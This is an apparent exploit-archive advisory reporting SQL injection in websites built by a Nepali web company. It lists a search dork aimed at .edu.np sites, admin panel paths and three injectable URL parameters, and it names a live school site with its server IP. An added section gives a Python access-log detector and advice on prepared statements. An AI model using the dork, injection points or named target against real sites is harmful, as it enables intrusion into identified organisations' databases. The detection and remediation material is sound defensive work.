
Power By W3 IT Solution Web Company Nepal SQL Injection

Author: KingSkrupellos, Published: 11-01-2019
# Exploit Title : Power By W3 IT Solution Web Company Nepal SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : w3itsolution.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Power by W3 IT SOLUTION'' site:edu.np
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

##########################################################

# Admin Panel Login Path :
*************************

/home/admin_tansen_multiple/

/home/admin_[PATH]_multiple/

# SQL Injection Exploit :
**********************

/home/news.php?ID=[SQL Injection]

/home/gallery_details.php?catID=[SQL Injection]

/home/conn.php?ID=[SQL Injection]
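
# Detection Example (added; not part of the original advisory or the vendor's code) :

A log check that flags requests to the three endpoints listed above whose ID / catID value is not a plain integer after URL-decoding, such as the ID=2%27 request cited in this advisory. Assumptions: the web server writes the Apache/nginx "combined" log format, legitimate IDs are purely numeric, and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint -> parameter pairs taken from the advisory.
WATCHED = {
    "/home/news.php": "ID",
    "/home/gallery_details.php": "catID",
    "/home/conn.php": "ID",
}

# Assumption: "combined" access-log format (client, timestamp, request line, status).
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})'
)

def suspicious_value(value):
    """True when a value that should be a row id is not a plain integer."""
    return re.fullmatch(r"[0-9]{1,10}", value) is None

def scan(lines):
    """Return (client, path, param, decoded_value, status) per flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        param = WATCHED.get(url.path)
        if param is None:
            continue  # endpoint not named in the advisory
        # parse_qsl percent-decodes, so %27 is compared as a literal quote.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == param and suspicious_value(value):
                hits.append((client, url.path, name, value, status))
    return hits

# Constructed sample lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2019:10:00:01 +0000] "GET /home/news.php?ID=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [08/Jan/2019:10:00:07 +0000] "GET /home/news.php?ID=2%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [08/Jan/2019:10:01:12 +0000] "GET /home/gallery_details.php?catID=7 HTTP/1.1" 200 8040 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [08/Jan/2019:10:01:30 +0000] "GET /home/gallery_details.php?catID=5%27 HTTP/1.1" 200 298 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("non-numeric id:", hit)
```

A hit only shows that a non-numeric value reached the endpoint; the fix on the server side is to cast the parameter to an integer and bind it in a mysqli or PDO prepared statement, as the deprecation notice further down already suggests.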

##########################################################

# Example Vulnerable Site =>
**************************

Note => (72.29.65.177) => There are 540 domains hosted on this server.

[+] tansenmultiple.edu.np/home/news.php?ID=2%27 =>

[Proof of Concept] => archive.fo/aiRil

##########################################################

# SQL Database Error :
********************

Deprecated: mysql_connect(): The mysql extension is deprecated
and will be removed in the future: use mysqli or PDO instead in
/home/tansen/public_html/home/conn.php on line 2

##########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
